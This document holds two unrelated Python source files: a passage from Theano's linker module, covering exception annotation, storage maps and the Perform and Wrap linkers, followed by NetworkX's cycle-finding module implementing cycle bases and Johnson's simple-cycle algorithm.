log_thunk_trace(value)
__excepthook(type, value, trace)
sys.excepthook = thunk_hook
# TODO: Make this work with linker defined schedule
def raise_with_op(node, thunk=None, exc_info=None, storage_map=None):
"""
Re-raise an exception while annotating the exception object with
debug info.
Parameters
----------
node : Apply node
The Apply node object that resulted in the raised exception.
exc_info : tuple, optional
A tuple containing the exception type, exception object and
associated traceback, as would be returned by a call to
`sys.exc_info()` (which is done if `None` is passed).
storage_map: dict, optional
storage map of the theano function that resulted in the
raised exception.
Notes
-----
This re-raises the exception described by `exc_info` (or the last
one raised, if `exc_info` is omitted) and annotates the exception
object with several new members which may be helpful for debugging
Theano graphs. They are:
* __op_instance__: The Op that is responsible for the exception
being raised.
* __thunk_trace__: A traceback corresponding to the code that
actually generated the exception, if it is available.
* __applynode_index__: The index of the Apply node corresponding
to this op in `op.fgraph.toposort()`.
The exception is not annotated if it is of type `KeyboardInterrupt`.
"""
if exc_info is None:
exc_info = sys.exc_info()
exc_type, exc_value, exc_trace = exc_info
if exc_type == KeyboardInterrupt:
# print a simple traceback from KeyboardInterrupt
reraise(exc_type, exc_value, exc_trace)
try:
trace = node.outputs[0].tag.trace
except AttributeError:
try:
trace = node.op.tag.trace
except AttributeError:
trace = ()
exc_value.__thunk_trace__ = trace
exc_value.__op_instance__ = node
topo = node.fgraph.toposort()
if node in topo:
node_index = topo.index(node)
else:
node_index = None
exc_value.__applynode_index__ = node_index
hints = []
detailed_err_msg = "\nApply node that caused the error: " + str(node)
if exc_value.__applynode_index__ is not None:
detailed_err_msg += "\nToposort index: %d" % node_index
types = [getattr(ipt, 'type', 'No type') for ipt in node.inputs]
detailed_err_msg += "\nInputs types: %s\n" % types
if thunk is not None:
if hasattr(thunk, 'inputs'):
shapes = [getattr(ipt[0], 'shape', 'No shapes')
for ipt in thunk.inputs]
strides = [getattr(ipt[0], 'strides', 'No strides')
for ipt in thunk.inputs]
scalar_values = []
for ipt in thunk.inputs:
if getattr(ipt[0], "size", -1) <= 5:
scalar_values.append(ipt[0])
else:
scalar_values.append("not shown")
else:
shapes = "The thunk don't have an inputs attributes."
strides = "So we can't access the strides of inputs values"
scalar_values = "And can't print its inputs scalar value"
clients = [[c[0] for c in var.clients] for var in node.outputs]
detailed_err_msg += ("Inputs shapes: %s" % shapes +
"\nInputs strides: %s" % strides +
"\nInputs values: %s" % scalar_values)
if hasattr(node.op, '__input_name__'):
detailed_err_msg += "\nInputs name: %s\n" % str(node.op.__input_name__)
detailed_err_msg += "\nOutputs clients: %s\n" % clients
else:
hints.append(
"HINT: Use another linker then the c linker to"
" have the inputs shapes and strides printed.")
# Print node backtraces
tr = getattr(node.outputs[0].tag, 'trace', [])
if len(tr) > 0:
detailed_err_msg += "\nBacktrace when the node is created:\n"
# Print a separate message for each element in the list of backtraces
sio = StringIO()
for subtr in tr:
traceback.print_list(subtr, sio)
detailed_err_msg += str(sio.getvalue())
else:
hints.append(
"HINT: Re-running with most Theano optimization disabled could"
" give you a back-trace of when this node was created. This can"
" be done with by setting the Theano flag"
" 'optimizer=fast_compile'. If that does not work,"
" Theano optimizations can be disabled with 'optimizer=None'.")
if theano.config.exception_verbosity == 'high':
f = StringIO()
theano.printing.debugprint(node, file=f, stop_on_name=True,
print_type=True)
detailed_err_msg += "\nDebugprint of the apply node: \n"
detailed_err_msg += f.getvalue()
# Prints output_map
if theano.config.exception_verbosity == 'high' and storage_map is not None:
detailed_err_msg += "\nStorage map footprint:\n"
shared_input_list = [
item for item in node.fgraph.inputs
if isinstance(item, theano.compile.SharedVariable)]
nonshared_input_list = [
item for item in node.fgraph.inputs
if not isinstance(item, theano.compile.SharedVariable)]
storage_map_list = []
total_size = 0
total_size_inputs = 0
for k in storage_map:
storage_map_item = []
# storage_map_item[0]: the variable
storage_map_item.append(str(k))
# storage_map_item[1]: the shape
shapeinfo = None
if hasattr(storage_map[k][0], 'shape'):
shapeinfo = storage_map[k][0].shape
if len(shapeinfo) != 0:
storage_map_item.append(shapeinfo)
else:
storage_map_item.append(tuple())
else:
storage_map_item.append(None)
# storage_map_item[2]: itemsize
# storage_map_item[3]: bytes
if hasattr(storage_map[k][0], 'dtype'):
dtype = storage_map[k][0].dtype
storage_map_item.append(numpy.dtype(dtype).itemsize)
if shapeinfo is None:
storage_map_item.append(None)
else:
sz = numpy.dtype(dtype).itemsize * numpy.prod(shapeinfo)
storage_map_item.append(sz)
total_size += sz
if not k.owner:
total_size_inputs += sz
else:
# If it is a view, don't count it twice.
if getattr(k.owner.op, 'view_map', None):
vmap = k.owner.op.view_map
out_idx = k.owner.outputs.index(k)
data = storage_map[k][0]
if out_idx in vmap:
assert len(vmap[out_idx]) == 1
input_data = storage_map[
k.owner.inputs[vmap[out_idx][0]]][0]
if k.type.may_share_memory(data, input_data):
total_size -= sz
# If it is a destroyed input, the input
# shouldn't be in the storage_map anymore
# except if there is a special flag used. So
# we still must check it.
if getattr(k.owner.op, 'destroy_map', None):
vmap = k.owner.op.destroy_map
out_idx = k.owner.outputs.index(k)
data = storage_map[k][0]
if out_idx in vmap:
assert len(vmap[out_idx]) == 1
input_data = storage_map[
k.owner.inputs[vmap[out_idx][0]]][0]
if k.type.may_share_memory(data, input_data):
total_size -= sz
else:
bytes = getsizeof(storage_map[k][0])
storage_map_item.append(bytes)
storage_map_item.append(None)
# Flag of shared val
# storage_map_item[4]
if k in shared_input_list:
storage_map_item.append(True)
elif k in nonshared_input_list:
storage_map_item.append(False)
else:
storage_map_item.append(None)
storage_map_list.append(storage_map_item)
from operator import itemgetter
storage_map_list.sort(key=itemgetter(3), reverse=True)
for item in storage_map_list:
if item[3] is None:
continue
detailed_err_msg += " - " + item[0] + ", "
if item[4] is True:
detailed_err_msg += "Shared Input, "
elif item[4] is False:
detailed_err_msg += "Input, "
if item[1] is not None:
detailed_err_msg += "Shape: %s, " % str(item[1])
detailed_err_msg += "ElemSize: %s Byte(s)" % item[2]
if item[3] is not None:
detailed_err_msg += ", TotalSize: %s Byte(s)\n" % item[3]
else:
detailed_err_msg += "\n"
detailed_err_msg += " TotalSize: %s Byte(s) %.3f GB\n" % (
total_size, total_size / 1024. / 1024 / 1024)
detailed_err_msg += " TotalSize inputs: %s Byte(s) %.3f BG\n" % (
total_size_inputs, total_size_inputs / 1024. / 1024 / 1024)
else:
hints.append(
"HINT: Use the Theano flag 'exception_verbosity=high'"
" for a debugprint and storage map footprint of this apply node.")
exc_value = exc_type(str(exc_value) + detailed_err_msg +
'\n' + '\n'.join(hints))
reraise(exc_type, exc_value, exc_trace)
class Linker(object):
"""WRITEME"""
def clone(self, allow_gc=undef):
new = copy(self)
if allow_gc is not undef:
new.allow_gc = allow_gc
return new
def make_thunk(self):
"""
This function must return a triplet (function, input_variables, output_variables)
where function is a thunk that operates on the returned variables. If inplace
is True, the input_variables and output_variables lists will be the same as the
inputs and outputs of the graph provided to the L{Linker}. Else, independent
variables will be returned.
Example::
x, y = Variable(Double), Variable(Double)
e = x + y
fgraph = FunctionGraph([x, y], [e])
fn, (new_x, new_y), (new_e, ) = MyLinker(fgraph).make_thunk(inplace)
new_x.data = 1.0
new_y.data = 2.0
fn()
print(new_e.data) # 3.0
print(e.data) # 3.0 iff inplace == True (else unknown)
"""
raise utils.MethodNotDefined("make_thunk", type(self),
self.__class__.__name__)
# DELETEME #
def make_function(self, unpack_single=True, **kwargs):
"""
Returns a function that takes values corresponding to the inputs of the
fgraph used by this L{Linker} and returns values corresponding to the outputs
of that fgraph. If inplace is True, the calculations will operate in the
same storage the fgraph uses, else independent storage will be allocated
for the function.
Example::
e = x + y
fgraph = FunctionGraph([x, y], [e])
fn = MyLinker(fgraph).make_function(inplace)
print(fn(1.0, 2.0)) # 3.0
print(e.data) # 3.0 iff inplace == True (else unknown)
If unpack_single is True (default) and the function has only one
output, then that output will be returned. Else, a list or tuple of
length 1 will be returned.
"""
thunk, inputs, outputs = self.make_thunk(**kwargs)
def execute(*args):
def e_arity(takes, got):
return 'Function call takes exactly %i %s (%i given)' % (
takes, ['argument', 'arguments'][takes > 1], got)
if (len(args) != len(inputs)):
raise TypeError(e_arity(len(inputs), len(args)))
for arg, variable in izip(args, inputs):
variable.data = arg
thunk()
if unpack_single:
return utils.to_return_values([variable.data
for variable in outputs])
else:
return [variable.data for variable in outputs]
execute.thunk = thunk
execute.inputs = inputs
execute.outputs = outputs
return execute
def schedule(self, fgraph):
return fgraph.toposort()
# TODO: Move this class to the compile module, where it is used (and for which it exists).
class Container(object):
"""This class joins a variable with its computed value.
It is used in linkers, especially for the inputs and outputs of a Function.
"""
def __init__(self, r, storage, readonly=False, strict=False,
allow_downcast=None, name=None):
"""WRITEME
:Parameters:
`r`: a Variable or a Type
`storage`: a list of length 1, whose element is the value for `r`
`readonly`: True indicates that this should not be settable by Function[r] = val
`strict`: if True, we don't allow type casting.
`allow_downcast`: if True (and `strict` is False), allow the value to
be downcast (possibly losing precision). If False, prevent it. If None
(default), only allow downcasting of a Python float to a floatX scalar.
`name`: A string (for pretty-printing?)
"""
if not isinstance(storage, list) or not len(storage) >= 1:
raise TypeError("storage must be a list of length at least one")
# self.r = r
if isinstance(r, Type):
self.type = r
else:
self.type = r.type
if name is None:
# Some Type do not have a name field.
self.name = getattr(r, 'name', None)
else:
self.name = name
self.storage = storage
self.readonly = readonly
self.strict = strict
self.allow_downcast = allow_downcast
def __get__(self):
return self.storage[0]
def __set__(self, value):
if self.readonly:
raise Exception("Cannot set readonly storage: %s" % self.name)
try:
if value is None:
self.storage[0] = None
return
kwargs = {}
if self.strict:
kwargs['strict'] = True
if self.allow_downcast is not None:
kwargs['allow_downcast'] = self.allow_downcast
if hasattr(self.type, 'filter_inplace'):
self.storage[0] = self.type.filter_inplace(value,
self.storage[0],
**kwargs)
else:
self.storage[0] = self.type.filter(value, **kwargs)
except Exception as e:
e.args = e.args + (('Container name "%s"' % self.name),)
raise
data = property(__get__, __set__)
value = property(__get__, __set__)
def __str__(self):
return "<" + str(self.storage[0]) + ">"
def __repr__(self):
return "<" + repr(self.storage[0]) + ">"
def __deepcopy__(self, memo):
data_was_in_memo = id(self.storage[0]) in memo
r = type(self)(
deepcopy(self.type, memo=memo),
deepcopy(self.storage, memo=memo),
deepcopy(self.readonly, memo=memo),
deepcopy(self.strict, memo=memo),
deepcopy(self.allow_downcast, memo=memo),
deepcopy(self.name, memo=memo),
)
# Work around NumPy's deepcopy of a 0-dimensional ndarray, which
# doesn't return an ndarray.
if (r.storage[0] is not None and
not self.type.is_valid_value(r.storage[0])):
assert not data_was_in_memo
assert self.type.is_valid_value(self.storage[0])
# This should also work for read only container.
r.storage[0] = self.type.filter(r.storage[0],
strict=False,
allow_downcast=False)
memo[id(self.storage[0])] = r.storage[0]
return r
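# Illustrative usage (assuming some Theano Type instance `x_type`):
#     c = Container(x_type, [None], name='x')
#     c.data = 1.0   # value goes through x_type.filter(...) into c.storage[0]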
def map_storage(fgraph, order, input_storage, output_storage):
"""Ensure there is storage (a length-1 list) for inputs, outputs, and interior nodes.
:param fgraph: The current fgraph. This function uses the inputs and outputs attributes.
:param order: an iterable over Apply instances (in program running order)
:param input_storage: None or existing input storage (see below)
:param output_storage: None or existing output storage (see below)
:rtype: 3-tuple
:returns: (list of storage for inputs, list of storage for outputs, and the `storage_map`)
This function iterates over the nodes in `order` and ensures that for every
input and output `Variable`, there is a unique storage container. This is
returned as a dictionary Variable->storage called the `storage_map`.
This function also returns `input_storage` which is a list of storages corresponding to fgraph.inputs.
This function also returns `output_storage` which is a list of storages corresponding to fgraph.outputs.
"""
# each Apply argument's data is stored in a list of length 1 (these lists act like pointers)
# input_storage is a list of data-containers for the inputs.
if input_storage is None:
input_storage = [[None] for input in fgraph.inputs]
else:
assert len(fgraph.inputs) == len(input_storage)
storage_map = {}
for r, storage in izip(fgraph.inputs, input_storage):
storage_map[r] = storage
# for orphan in fgraph.orphans:
# if not isinstance(orphan, Constant):
# raise TypeError("Cannot link a graph with non-constant orphans.", orphan)
# storage_map[orphan] = [orphan.data]
if output_storage is not None:
assert len(fgraph.outputs) == len(output_storage)
for r, storage in izip(fgraph.outputs, output_storage):
storage_map[r] = storage
for node in order:
for r in node.inputs:
if r not in storage_map:
assert isinstance(r, graph.Constant)
storage_map[r] = [r.data]
for r in node.outputs:
storage_map.setdefault(r, [None])
for r in fgraph.outputs:
if isinstance(r, graph.Constant):
storage_map.setdefault(r, [r.data])
if output_storage is None:
output_storage = [storage_map[r] for r in fgraph.outputs]
return input_storage, output_storage, storage_map
def streamline(fgraph, thunks, order, post_thunk_old_storage=None,
no_recycling=None, nice_errors=True):
"""WRITEME
:param fgraph:
:param thunks: the list of program instructions
:param order: the list of apply instances that gave rise to the thunks (same order as thunks)
:param post_thunk_old_storage: a list (corresponding to thunks, order) whose elements are
lists of storage cells, that should be cleared after running the corresponding thunk. A
value of None disables this functionality
:param no_recycling: storage elements that cannot be 'recycled' by repeatedly executing the
program. These storage elements are cleared before re-running.
:param nice_errors: run in such a way that the double-traceback is printed. This costs a
bit of performance in the inner python loop.
"""
if no_recycling is None:
no_recycling = []
if len(thunks) != len(order):
raise ValueError('Length of thunks and order must match',
(len(thunks), len(order)))
if post_thunk_old_storage:
if len(thunks) != len(post_thunk_old_storage):
raise ValueError(
'Length of thunks and post_thunk_old_storage must match',
(len(thunks), len(post_thunk_old_storage)))
def streamline_default_f():
for x in no_recycling:
x[0] = None
try:
for thunk, node, old_storage in izip(thunks, order,
post_thunk_old_storage):
thunk()
for old_s in old_storage:
old_s[0] = None
except Exception:
raise_with_op(node, thunk)
f = streamline_default_f
elif nice_errors:
def streamline_nice_errors_f():
for x in no_recycling:
x[0] = None
try:
for thunk, node in izip(thunks, order):
thunk()
except Exception:
raise_with_op(node, thunk)
f = streamline_nice_errors_f
else:
# don't worry about raise_with_op, just go a little faster.
# there is a mix of python and c thunks
def streamline_fast_f():
for x in no_recycling:
x[0] = None
for thunk in thunks:
thunk()
f = streamline_fast_f
return f
class LocalLinker(Linker):
"""WRITEME
Useful base class for L{Linker}s which keep all nodes in the graph, and run a
thunk associated with each node.
"""
def make_thunk(self, input_storage=None, output_storage=None):
return self.make_all(input_storage=input_storage,
output_storage=output_storage)[:3]
def make_all(self, input_storage, output_storage):
# By convention, subclasses of LocalLinker should implement this function!
#
# This function should return a tuple of 5 things
# 1. function to run the program
# 2. input storage
# 3. output storage
# 4. thunks: list of nodes' functions in the order they will be run by the function in (1)
# 5. order: list of nodes, in the order they will be run by the function in (1)
raise utils.MethodNotDefined("make_all", type(self),
self.__class__.__name__)
def gc_helper(node_list):
"""
:param node_list: list of Apply instances in program execution order
:rtype: a 2-tuple
:returns: FIRST, the set of Variable instances which are computed by node_list, and SECOND a
dictionary that maps each Variable instance to the last node that uses it as an input.
This is used to allow garbage collection within graphs.
It ignores view_map and destroy_map. This isn't needed as Python
has reference counting. In Theano's gc, we should not take
view_map and destroy_map into account: if the thunk decided to create
a new output, that would uselessly delay its gc by Python.
"""
# for freeing memory
last_user = {}
computed = set()
for node in node_list:
for input in node.inputs:
last_user[input] = node
for output in node.outputs:
computed.add(output)
return computed, last_user
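# Illustrative example: for nodes n1 computing c = a + b and n2 computing
# d = c * a (run in that order), gc_helper([n1, n2]) returns
# computed = {c, d} and last_user = {a: n2, b: n1, c: n2}.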
class PerformLinker(LocalLinker):
"""WRITEME
Basic L{Linker} subclass that calls the perform method on each L{Op} in
the L{FunctionGraph} in the order given by L{Linker.schedule}.
"""
def __init__(self, allow_gc=None, schedule=None):
if allow_gc is None:
allow_gc = theano.config.allow_gc
self.fgraph = None
self.allow_gc = allow_gc
if schedule:
self.schedule = schedule
def accept(self, fgraph, no_recycling=None):
"""
:param fgraph: a PerformLinker can have accepted one FunctionGraph instance at a time.
:param no_recycling: WRITEME
:returns: self (TODO: WHY? Who calls this function?)
"""
if no_recycling is None:
no_recycling = []
if self.fgraph is not None and self.fgraph is not fgraph:
return type(self)(allow_gc=self.allow_gc).accept(fgraph, no_recycling)
# raise Exception("Cannot accept from a Linker that is already tied to another FunctionGraph.")
self.fgraph = fgraph
self.no_recycling = no_recycling
return self
def make_all(self, input_storage=None, output_storage=None):
"""
:param input_storage: WRITEME
:param output_storage: WRITEME
:returns: function to run all nodes, list of input containers, list of output containers, list of thunks (for all of program), list of nodes (for all of program)
"""
fgraph = self.fgraph
order = self.schedule(fgraph)
no_recycling = self.no_recycling
input_storage, output_storage, storage_map = map_storage(fgraph, order, input_storage, output_storage)
compute_map = {}
for k in storage_map:
compute_map[k] = [k.owner is None]
thunks = []
for node in order:
# Make sure we don't use the C version of the code, but rather only
# the Python version
# Note: ops that implement their own make_thunk don't usually
# have this attribute defined!
old_value = getattr(node.op, '_op_use_c_code', False)
try:
node.op._op_use_c_code = False
thunks += [node.op.make_thunk(node,
storage_map,
compute_map,
no_recycling)]
thunks[-1].inputs = [storage_map[v] for v in node.inputs]
thunks[-1].outputs = [storage_map[v] for v in node.outputs]
finally:
node.op._op_use_c_code = old_value
computed, last_user = gc_helper(order)
if self.allow_gc:
post_thunk_old_storage = []
else:
post_thunk_old_storage = None
for node in order:
if self.allow_gc:
post_thunk_old_storage.append(
[storage_map[input]
for input in node.inputs
if (input in computed) and (
input not in fgraph.outputs) and (
node == last_user[input])])
if no_recycling is True:
# True seems like some special code for *everything*?? -JB
# FunctionMaker always passes a list I think -JB
no_recycling = list(storage_map.values())
no_recycling = utils.difference(no_recycling, input_storage)
else:
no_recycling = [storage_map[r] for r in no_recycling if r not in fgraph.inputs]
# The function that actually runs your program is one of the f's in streamline.
f = streamline(fgraph, thunks, order, post_thunk_old_storage,
no_recycling=no_recycling)
f.allow_gc = self.allow_gc # HACK: this is a way of passing an arg to Function.__call__
add_clear_storage(f, computed, storage_map)
f.storage_map = storage_map
return (f,
[Container(input, storage)
for input, storage in izip(fgraph.inputs, input_storage)],
[Container(output, storage, True)
for output, storage in izip(fgraph.outputs, output_storage)],
thunks,
order)
def add_clear_storage(f, computed, storage_map):
def clear_storage():
for c in computed:
storage_map[c][0] = None
f.clear_storage = clear_storage
class WrapLinker(Linker):
"""
WRITEME
This class makes it easier to run several L{LocalLinker}s in parallel, and
offers some control over how each thunk is run.
A wrapper function must be provided, and it can be used to execute the
thunks, inspect the nodes, print stuff out, etc.
@note:
The outputs of the first linker will be returned.
@note:
This linker ensures that each linker has its own storage for
inputs and outputs and intermediate variables. There is no interference
between linkers.
"""
def __init__(self, linkers, wrapper):
"""
Initialize a WrapLinker.
@type linkers: list of L{LocalLinker} subclasses, whose make_all()
method returns thunks in the same order.
@param linkers: for each node in the graph, each linker will provide a
thunk. This class makes it possible to iterate over each linker's
program in parallel.
@type wrapper: lambda (i, i_node, i_thunk1, i_thunk2, ...) : None
@param wrapper: do some user-defined action for the i'th element of the
program. i_thunk<n> is the thunk returned by the n'th linker. (If you
want to run the program, make sure to call the necessary thunks in this
function.)
"""
self.fgraph = None
self.linkers = linkers
self.wrapper = wrapper
def __copy__(self):
"""
Shallow copy of a WrapLinker.
@returns: A copy of self, where each of the linkers in self.linkers
have been shallow-copied.
It is useful because in FunctionMaker, copy.copy is called on the
Mode's linker, so that it is not modified inplace when linker.accept()
is called. In this case, we want the wrapped linkers to be copied too.
"""
other = self.__class__(
linkers=[copy(l) for l in self.linkers],
wrapper=self.wrapper)
return other
def clone(self, allow_gc=undef):
return self.__class__(
linkers=[l.clone(allow_gc=allow_gc) for l in self.linkers],
wrapper=self.wrapper)
def accept(self, fgraph, no_recycling=None):
"""
@type fgraph: gof.FunctionGraph
@param fgraph: the fgraph which we will link
@type no_recycling: a list of Variables that belong to fgraph.
@param no_recycling: If a Variable is in no_recycling, L{WrapLinker} will clear
the output storage associated to it (for each linker in linkers) during
the computation to avoid reusing it.
"""
if no_recycling is None:
no_recycling = []
if self.fgraph is not None and self.fgraph is not fgraph:
return type(self)(self.linkers, self.wrapper).accept(fgraph,
no_recycling)
self.fgraph = fgraph
self.no_recycling = no_recycling
self.linkers = [linker.accept(fgraph, no_recycling)
for linker in self.linkers]
return self
def pre(self, f, inputs, order, thunk_groups):
pass
def make_thunk(self, **kwargs):
no_recycling = self.no_recycling
make_all = [self.linkers[0].make_all(**kwargs)]
kwargs.pop('input_storage', None)
make_all += [l.make_all(**kwargs) for l in self.linkers[1:]]
fns, input_lists, output_lists, thunk_lists, order_lists \
= zip(*make_all)
order_list0 = order_lists[0]
for order_list in order_lists[1:]:
if not order_list0 == order_list:
raise Exception(
"All linkers to WrapLinker should execute operations in the same order.")
inputs0 = input_lists[0]
outputs0 = output_lists[0]
thunk_groups = list(zip(*thunk_lists))
order = [x[0] for x in zip(*order_lists)]
to_reset = []
for thunks, node in izip(thunk_groups, order):
for j, output in enumerate(node.outputs):
if output in no_recycling:
for thunk in thunks:
to_reset.append(thunk.outputs[j])
wrapper = self.wrapper
pre = self.pre
def f():
for inputs in input_lists[1:]:
for input1, input2 in izip(inputs0, inputs):
input2.storage[0] = copy(input1.storage[0])
for x in to_reset:
x[0] = None
pre(self, [input.data for input in input_lists[0]],
order, thunk_groups)
for i, (thunks, node) in enumerate(izip(thunk_groups, order)):
try:
wrapper(i, node, *thunks)
except Exception:
raise_with_op(node, *thunks)
f.thunk_groups = thunk_groups
return f, inputs0, outputs0
def WrapLinkerMany(linkers, wrappers):
"""
Variant on WrapLinker that runs a series of wrapper functions instead of
just one.
"""
def wrapper(*args):
for f in wrappers:
f(*args)
return WrapLinker(linkers, wrapper)
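# Illustrative sketch (hypothetical wrapper): run two PerformLinkers in
# lock-step, executing every thunk of each linker for every node.
#
#     def run_all(i, node, *thunks):
#         for th in thunks:
#             th()
#
#     linker = WrapLinkerMany([PerformLinker(), PerformLinker()], [run_all])
#     fn, inputs, outputs = linker.accept(fgraph).make_thunk()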
|
|
"""
========================
Cycle finding algorithms
========================
"""
# Copyright (C) 2010-2012 by
# Aric Hagberg <[email protected]>
# Dan Schult <[email protected]>
# Pieter Swart <[email protected]>
# All rights reserved.
# BSD license.
import networkx as nx
from networkx.utils import *
from collections import defaultdict
__all__ = ['cycle_basis','simple_cycles','recursive_simple_cycles']
__author__ = "\n".join(['Jon Olav Vik <[email protected]>',
'Dan Schult <[email protected]>',
'Aric Hagberg <[email protected]>'])
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def cycle_basis(G,root=None):
""" Returns a list of cycles which form a basis for cycles of G.
A basis for cycles of a network is a minimal collection of
cycles such that any cycle in the network can be written
as a sum of cycles in the basis. Here summation of cycles
is defined as "exclusive or" of the edges. Cycle bases are
useful, e.g. when deriving equations for electric circuits
using Kirchhoff's Laws.
Parameters
----------
G : NetworkX Graph
root : node, optional
Specify starting node for basis.
Returns
-------
A list of cycle lists. Each cycle list is a list of nodes
which forms a cycle (loop) in G.
Examples
--------
>>> G=nx.Graph()
>>> G.add_cycle([0,1,2,3])
>>> G.add_cycle([0,3,4,5])
>>> print(nx.cycle_basis(G,0))
[[3, 4, 5, 0], [1, 2, 3, 0]]
Notes
-----
This is adapted from algorithm CACM 491 [1]_.
References
----------
.. [1] Paton, K. An algorithm for finding a fundamental set of
cycles of a graph. Comm. ACM 12, 9 (Sept 1969), 514-518.
See Also
--------
simple_cycles
"""
gnodes=set(G.nodes())
cycles=[]
while gnodes: # loop over connected components
if root is None:
root=gnodes.pop()
stack=[root]
pred={root:root}
used={root:set()}
while stack: # walk the spanning tree finding cycles
z=stack.pop() # use last-in so cycles easier to find
zused=used[z]
for nbr in G[z]:
if nbr not in used: # new node
pred[nbr]=z
stack.append(nbr)
used[nbr]=set([z])
elif nbr == z: # self loops
cycles.append([z])
elif nbr not in zused:# found a cycle
pn=used[nbr]
cycle=[nbr,z]
p=pred[z]
while p not in pn:
cycle.append(p)
p=pred[p]
cycle.append(p)
cycles.append(cycle)
used[nbr].add(z)
gnodes-=set(pred)
root=None
return cycles
@not_implemented_for('undirected')
def simple_cycles(G):
"""Find simple cycles (elementary circuits) of a directed graph.
A simple cycle, or elementary circuit, is a closed path where no
node appears twice, except that the first and last node are the same.
Two elementary circuits are distinct if they are not cyclic permutations
of each other.
This is a nonrecursive, iterator/generator version of Johnson's
algorithm [1]_. There may be better algorithms for some cases [2]_ [3]_.
Parameters
----------
G : NetworkX DiGraph
A directed graph
Returns
-------
cycle_generator: generator
A generator that produces elementary cycles of the graph. Each cycle is
a list of nodes with the first and last nodes being the same.
Examples
--------
>>> G = nx.DiGraph([(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)])
>>> list(nx.simple_cycles(G))
[[2], [2, 1], [2, 0], [2, 0, 1], [0]]
Notes
-----
The implementation follows pp. 79-80 in [1]_.
The time complexity is O((n+e)(c+1)) for n nodes, e edges and c
elementary circuits.
To filter the cycles so that they don't include certain nodes or edges,
copy your graph and eliminate those nodes or edges before calling.
>>> copyG = G.copy()
>>> copyG.remove_nodes_from([1])
>>> copyG.remove_edges_from([(0,1)])
>>> list(nx.simple_cycles(copyG))
[[2], [2, 0], [0]]
References
----------
.. [1] Finding all the elementary circuits of a directed graph.
D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
http://dx.doi.org/10.1137/0204007
.. [2] Enumerating the cycles of a digraph: a new preprocessing strategy.
G. Loizou and P. Thanish, Information Sciences, v. 27, 163-182, 1982.
.. [3] A search strategy for the elementary cycles of a directed graph.
J.L. Szwarcfiter and P.E. Lauer, BIT NUMERICAL MATHEMATICS,
v. 16, no. 2, 192-204, 1976.
See Also
--------
cycle_basis
"""
def _unblock(thisnode,blocked,B):
stack=set([thisnode])
while stack:
node=stack.pop()
if node in blocked:
blocked.remove(node)
stack.update(B[node])
B[node].clear()
# Johnson's algorithm requires some ordering of the nodes.
# We assign the arbitrary ordering given by the strongly connected comps
# There is no need to track the ordering as each node is removed as it is processed.
subG = type(G)(G.edges_iter()) # save the actual graph so we can mutate it here
# We only take the edges because we do not want to
# copy edge and node attributes here.
sccs = list(nx.strongly_connected_components(subG))
while sccs:
scc=sccs.pop()
# order of scc determines ordering of nodes
startnode = scc.pop()
# Processing node runs "circuit" routine from recursive version
path=[startnode]
blocked = set() # vertex: blocked from search?
closed = set() # nodes involved in a cycle
blocked.add(startnode)
B=defaultdict(set) # graph portions that yield no elementary circuit
stack=[ (startnode,list(subG[startnode])) ] # subG gives component nbrs
while stack:
thisnode,nbrs = stack[-1]
if nbrs:
nextnode = nbrs.pop()
# print thisnode,nbrs,":",nextnode,blocked,B,path,stack,startnode
# f=raw_input("pause")
if nextnode == startnode:
yield path[:]
closed.update(path)
# print "Found a cycle",path,closed
elif nextnode not in blocked:
path.append(nextnode)
stack.append( (nextnode,list(subG[nextnode])) )
closed.discard(nextnode)
blocked.add(nextnode)
continue
# done with nextnode... look for more neighbors
if not nbrs: # no more nbrs
if thisnode in closed:
_unblock(thisnode,blocked,B)
else:
for nbr in subG[thisnode]:
if thisnode not in B[nbr]:
B[nbr].add(thisnode)
stack.pop()
# assert path[-1]==thisnode
path.pop()
# done processing this node
subG.remove_node(startnode)
H=subG.subgraph(scc) # make smaller to avoid work in SCC routine
sccs.extend(list(nx.strongly_connected_components(H)))
@not_implemented_for('undirected')
def recursive_simple_cycles(G):
"""Find simple cycles (elementary circuits) of a directed graph.
A simple cycle, or elementary circuit, is a closed path where no
node appears twice, except that the first and last node are the same.
Two elementary circuits are distinct if they are not cyclic permutations
of each other.
This version uses a recursive algorithm to build a list of cycles.
    You should probably use the iterator version called simple_cycles().
Warning: This recursive version uses lots of RAM!
Parameters
----------
G : NetworkX DiGraph
A directed graph
Returns
-------
    A list of circuits, where each circuit is a list of the nodes along the
    cycle, with no node repeated; the closing edge back to the first node is
    implicit.
    Examples
    --------
>>> G = nx.DiGraph([(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)])
>>> nx.recursive_simple_cycles(G)
[[0], [0, 1, 2], [0, 2], [1, 2], [2]]
Notes
-----
The implementation follows pp. 79-80 in [1]_.
The time complexity is O((n+e)(c+1)) for n nodes, e edges and c
elementary circuits.
References
----------
.. [1] Finding all the elementary circuits of a directed graph.
D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
http://dx.doi.org/10.1137/0204007
See Also
--------
    simple_cycles, cycle_basis (for undirected graphs)
"""
# Jon Olav Vik, 2010-08-09
def _unblock(thisnode):
"""Recursively unblock and remove nodes from B[thisnode]."""
if blocked[thisnode]:
blocked[thisnode] = False
while B[thisnode]:
_unblock(B[thisnode].pop())
def circuit(thisnode, startnode, component):
closed = False # set to True if elementary path is closed
path.append(thisnode)
blocked[thisnode] = True
for nextnode in component[thisnode]: # direct successors of thisnode
if nextnode == startnode:
result.append(path[:])
closed = True
elif not blocked[nextnode]:
if circuit(nextnode, startnode, component):
closed = True
if closed:
_unblock(thisnode)
else:
for nextnode in component[thisnode]:
if thisnode not in B[nextnode]: # TODO: use set for speedup?
B[nextnode].append(thisnode)
path.pop() # remove thisnode from path
return closed
path = [] # stack of nodes in current path
blocked = defaultdict(bool) # vertex: blocked from search?
B = defaultdict(list) # graph portions that yield no elementary circuit
result = [] # list to accumulate the circuits found
# Johnson's algorithm requires some ordering of the nodes.
# They might not be sortable so we assign an arbitrary ordering.
ordering=dict(zip(G,range(len(G))))
for s in ordering:
# Build the subgraph induced by s and following nodes in the ordering
subgraph = G.subgraph(node for node in G
if ordering[node] >= ordering[s])
# Find the strongly connected component in the subgraph
# that contains the least node according to the ordering
strongcomp = nx.strongly_connected_components(subgraph)
mincomp=min(strongcomp,
key=lambda nodes: min(ordering[n] for n in nodes))
component = G.subgraph(mincomp)
if component:
# smallest node in the component according to the ordering
startnode = min(component,key=ordering.__getitem__)
for node in component:
blocked[node] = False
B[node][:] = []
dummy=circuit(startnode, startnode, component)
return result
